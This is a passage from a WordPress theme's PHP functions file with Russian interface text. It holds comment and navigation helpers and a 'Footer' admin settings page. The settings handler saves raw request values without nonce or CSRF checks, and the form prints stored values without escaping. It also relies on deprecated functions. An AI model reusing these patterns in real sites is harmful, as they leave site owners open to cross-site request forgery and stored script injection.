                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s - %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
